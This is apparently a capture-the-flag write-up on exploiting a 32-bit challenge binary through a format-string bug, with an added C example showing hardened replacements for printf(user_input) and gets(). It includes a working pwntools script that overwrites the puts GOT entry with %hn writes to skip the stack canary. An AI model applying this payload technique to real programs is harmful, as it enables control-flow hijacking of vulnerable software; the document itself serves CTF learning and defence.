Finches in a Stack (Unintentional Way)


This challenge wasn’t supposed to be solved like this when I was discussing it with the author. To see the intended way, check out Finches in PIE. It is similar to this one, except that PIE is enabled.



flag.txt (You need this in the same directory as fiap for the local exploit; fiap will read the flag once you exploit it.)


When you run the program, it asks you for two inputs, and it talks about a canary. I am guessing that you have to leak the canary and overwrite the return address with the first input, then repair the overwritten canary with the leaked value.

Static Analysis

There is a handy function called flag that prints out the flag.

In say_hi(), we can see that first_input is passed straight to printf, so it can be used for a format string vuln.

The second input is read with gets(), so it can be used for a BoF.
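As an added illustration (not the challenge's source, which this write-up does not reproduce), here are the two say_hi() defects just described beside the hardened form a fix would use. The function names, the 64-byte buffer and the sample inputs are my own assumptions; the real call sites would use fgets(buf, sizeof buf, stdin) in place of gets().

```c
#include <stdio.h>
#include <string.h>

/* Added example, not the challenge binary's code.
 *
 * Defect 1 (format string): printf(first_input) hands user text to printf
 * as the format, so %x / %n directives in it are interpreted.
 * Defect 2 (buffer overflow): gets(second_input) has no length bound, so a
 * long line overruns the stack buffer and the canary above it.
 *
 * Vulnerable shape (kept as a comment, not compiled):
 *     char first_input[64], second_input[64];
 *     gets(first_input);
 *     printf(first_input);        // user text IS the format string
 *     gets(second_input);         // unbounded write
 */

#define NAME_LEN 64   /* assumed buffer size for the example */

/* Hardened greeting: user text is an argument, never the format.
 * Returns the length the full greeting needs (snprintf semantics), or -1
 * on error.  Any %x / %n in 'name' comes out as literal text. */
int greet_safe(const char *name, char *out, size_t out_len)
{
    int n = snprintf(out, out_len, "Hello %s", name);
    return n < 0 ? -1 : n;
}

/* Hardened line read with the same contract as fgets(buf, buf_len, stdin):
 * copies at most buf_len-1 bytes, stops at newline, always NUL-terminates.
 * It reads from a string so the example runs on constructed input. */
size_t read_line_bounded(const char *src, char *buf, size_t buf_len)
{
    size_t i = 0;
    if (buf_len == 0)
        return 0;
    while (i < buf_len - 1 && src[i] != '\0' && src[i] != '\n') {
        buf[i] = src[i];
        i++;
    }
    buf[i] = '\0';
    return i;
}

/* Check a reviewer can run: after formatting, does the input text survive
 * verbatim in the output (i.e. were its directives NOT interpreted)? */
int directives_left_literal(const char *input)
{
    char out[256];
    if (greet_safe(input, out, sizeof out) < 0)
        return 0;
    return strstr(out, input) != NULL;
}

int main(void)
{
    char out[128];
    const char *probe = "%x.%x.%x.%n";          /* constructed probe input */
    greet_safe(probe, out, sizeof out);
    printf("%s\n", out);                          /* directives stay literal */

    char big[302];                                /* constructed 300-byte line */
    memset(big, 'A', 300);
    big[300] = '\n';
    big[301] = '\0';
    char name[NAME_LEN];
    size_t kept = read_line_bounded(big, name, sizeof name);
    printf("kept %zu of 300 bytes\n", kept);      /* 63: buffer bound held */
    return 0;
}
```

The point of the pair is that neither fix depends on the canary: with a constant format string there is no %n write to the GOT, and with a bounded read there is nothing to overrun in the first place.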


Looking at this problem, you can just use the format string exploit to overwrite the GOT entry of puts: after printf(&first_input) the program calls puts, and since execution never reaches the function's return, the canary is never checked and we go straight to the flag function.

from pwn import *

isLocal = True

if isLocal:
    p = process("./fias")
else:
    p = remote("", 34995)  # remote host left blank in the write-up

elf = ELF("./fias")

GOT_PUTS = elf.got['puts']   # 0x804c01c
FUNC_FLAG = elf.sym['flag']  # 0x080491d2
#Flag addr 0x080491d2

# Two %hn writes, high half first: 0x0804 -> GOT_PUTS+2, then 0x91d2 -> GOT_PUTS.
# Bytes printed before the first %hn: 12 (three 4-byte words) + 4*8 ('%.8x' * 4)
# = 44, + 2008 = 2052 = 0x0804.  Then + 35278 = 37330 = 0x91d2.
# The buffer starts at printf argument 6, which is where the first %hn lands.
p.sendline(p32(GOT_PUTS+2) + b'@@@@' + p32(GOT_PUTS) + b'%.8x' * 4 + b'%.2008x%hn' + b'%.35278x%hn')
p.interactive()  # puts now runs flag(), which prints flag.txt


